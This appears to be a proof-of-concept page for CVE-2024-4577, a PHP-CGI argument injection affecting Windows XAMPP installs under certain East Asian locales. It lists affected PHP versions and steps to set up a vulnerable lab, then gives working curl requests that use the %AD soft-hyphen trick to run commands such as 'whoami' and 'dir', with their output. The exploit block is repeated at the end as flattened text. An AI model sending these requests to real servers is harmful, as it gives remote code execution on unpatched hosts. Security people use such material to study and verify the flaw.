CVE-2024-4577

CVE-2024-4577 is a PHP CGI Argument Injection Vulnerability discovered by DEVCORE. The vulnerability has been verified on Windows machines running in the following locales:

Traditional Chinese (Code Page 950)
Simplified Chinese (Code Page 936)
Japanese (Code Page 932)

All versions of XAMPP on Windows are vulnerable by default. Following PHP versions are affected on the Windows operating system:

PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29

How to setup your own PoC environment

On your Windows machine download and install XAMPP.
Download mod_fcgid.so and paste it in C:\xampp\apache\modules
Verify that the below code is not commented in C:\xampp\apache\conf\extra\httpd-xampp.conf

#
# PHP-CGI setup
#
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>
<IfModule actions_module>
    Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
</IfModule>

Start the Apache / PHP using XAMPP Control Panel and verify that CGI/FastCGI is running.

Change system locale to either of the three listed locales above, and reboot the host. This will not change the Windows display language. Control Panel > Clock and Region > Region > Administrative > Change system locale...
Once rebooted start the webserver again and attack the target from any host.

dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "whoami"'); ?>"
desktop-n7r8uh6\void

dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "dir"'); ?>"
 Volume in drive C has no label.
 Volume Serial Number is 0AE3-44EE

 Directory of C:\xampp\htdocs

2024-08-14  12:25    <DIR>          .
2024-08-14  10:45    <DIR>          ..
2022-06-15  18:07             3?607 applications.html
2022-06-15  18:07               177 bitnami.css
2024-08-14  10:18    <DIR>          dashboard
2015-07-16  17:32            30?894 favicon.ico
2024-08-14  10:18    <DIR>          img
2015-07-16  17:32               260 index.php
2024-08-14  10:17    <DIR>          webalizer
2024-08-14  10:18    <DIR>          xampp
               4 File(s)         34?938 bytes
               6 Dir(s)  28?033?204?224 bytes free

Last updated 10 months ago

Was this helpful?

dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "whoami"'); ?>" desktop-n7r8uh6\void dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "dir"'); ?>" Volume in drive C has no label. Volume Serial Number is 0AE3-44EE Directory of C:\xampp\htdocs 2024-08-14 12:25 <DIR> . 2024-08-14 10:45 <DIR> .. 2022-06-15 18:07 3?607 applications.html 2022-06-15 18:07 177 bitnami.css 2024-08-14 10:18 <DIR> dashboard 2015-07-16 17:32 30?894 favicon.ico 2024-08-14 10:18 <DIR> img 2015-07-16 17:32 260 index.php 2024-08-14 10:17 <DIR> webalizer 2024-08-14 10:18 <DIR> xampp 4 File(s) 34?938 bytes 6 Dir(s) 28?033?204?224 bytes free